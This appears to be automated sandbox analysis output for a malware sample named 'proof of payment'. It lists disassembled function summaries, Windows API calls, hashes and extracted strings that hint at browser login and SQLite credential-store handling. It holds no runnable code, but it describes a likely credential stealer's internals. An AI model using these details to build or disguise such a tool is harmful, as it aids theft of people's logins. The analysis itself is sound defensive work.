                                      • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                      • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      • wcscpy.MSVCRT ref: 0040DAFB
                                      • wcscpy.MSVCRT ref: 0040DB0B
                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                      • API String ID: 3176057301-2039793938
                                      • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                      • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • database is already attached, xrefs: 0042F721
                                      • too many attached databases - max %d, xrefs: 0042F64D
                                      • database %s is already in use, xrefs: 0042F6C5
                                      • out of memory, xrefs: 0042F865
                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                      • unable to open database: %s, xrefs: 0042F84E
                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                      • API String ID: 1297977491-2001300268
                                      • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                      • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                      • memcpy.MSVCRT ref: 0040EB80
                                      • memcpy.MSVCRT ref: 0040EB94
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                      • String ID: ($d
                                      • API String ID: 1140211610-1915259565
                                      • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                      • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                      • GetLastError.KERNEL32 ref: 004178FB
                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$ErrorLastLockSleepUnlock
                                      • String ID:
                                      • API String ID: 3015003838-0
                                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 00407E44
                                      • memset.MSVCRT ref: 00407E5B
                                      • _mbscpy.MSVCRT ref: 00407E7E
                                      • _mbscpy.MSVCRT ref: 00407ED7
                                      • _mbscpy.MSVCRT ref: 00407EEE
                                      • _mbscpy.MSVCRT ref: 00407F01
                                      • wcscpy.MSVCRT ref: 00407F10
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                      • String ID:
                                      • API String ID: 59245283-0
                                      • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                      • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                      • GetLastError.KERNEL32 ref: 0041855C
                                      • Sleep.KERNEL32(00000064), ref: 00418571
                                      • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                      • GetLastError.KERNEL32 ref: 0041858E
                                      • Sleep.KERNEL32(00000064), ref: 004185A3
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                      • String ID:
                                      • API String ID: 3467550082-0
                                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                      • API String ID: 3510742995-3273207271
                                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                      • memset.MSVCRT ref: 00413ADC
                                      • memset.MSVCRT ref: 00413AEC
                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                      • memset.MSVCRT ref: 00413BD7
                                      • wcscpy.MSVCRT ref: 00413BF8
                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                      • String ID: 3A
                                      • API String ID: 3300951397-293699754
                                      • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                      • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                      • wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                      • wcslen.MSVCRT ref: 0040D1D3
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                      • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                      • memcpy.MSVCRT ref: 0040D24C
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                      • String ID: strings
                                      • API String ID: 3166385802-3030018805
                                      • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                      • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 00411AF6
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                      • wcsrchr.MSVCRT ref: 00411B14
                                      • wcscat.MSVCRT ref: 00411B2E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                      • String ID: AE$.cfg$General$EA
                                      • API String ID: 776488737-1622828088
                                      • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                      • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 0040D8BD
                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                      • memset.MSVCRT ref: 0040D906
                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                      • String ID: sysdatetimepick32
                                      • API String ID: 1028950076-4169760276
                                      • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                      • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID: -journal$-wal
                                      • API String ID: 438689982-2894717839
                                      • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                      • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Item$Dialog$MessageSend
                                      • String ID:
                                      • API String ID: 3975816621-0
                                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _wcsicmp.MSVCRT ref: 00444D09
                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                      • _wcsicmp.MSVCRT ref: 00444D33
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$wcslen$_memicmp
                                      • String ID: .save$http://$https://$log profile$signIn
                                      • API String ID: 1214746602-2708368587
                                      • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                      • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                      • String ID:
                                      • API String ID: 2313361498-0
                                      • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                      • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                      • String ID:
                                      • API String ID: 4218492932-0
                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                      • memcpy.MSVCRT ref: 0044A8BF
                                      • memcpy.MSVCRT ref: 0044A90C
                                      • memcpy.MSVCRT ref: 0044A988
                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                      • memcpy.MSVCRT ref: 0044A9D8
                                      • memcpy.MSVCRT ref: 0044AA19
                                      • memcpy.MSVCRT ref: 0044AA4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID: gj
                                      • API String ID: 438689982-4203073231
                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                      • API String ID: 3510742995-2446657581
                                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                      • memset.MSVCRT ref: 00405ABB
                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                      • SetFocus.USER32(?), ref: 00405B76
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: MessageSend$FocusItemmemset
                                      • String ID:
                                      • API String ID: 4281309102-0
                                      • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                      • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _snwprintfwcscat
                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                      • API String ID: 384018552-4153097237
                                      • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                      • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                      • String ID: 0$6
                                      • API String ID: 2029023288-3849865405
                                      • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                      • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                      • memset.MSVCRT ref: 00405455
                                      • memset.MSVCRT ref: 0040546C
                                      • memset.MSVCRT ref: 00405483
                                      • memcpy.MSVCRT ref: 00405498
                                      • memcpy.MSVCRT ref: 004054AD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$memcpy$ErrorLast
                                      • String ID: 6$\
                                      • API String ID: 404372293-1284684873
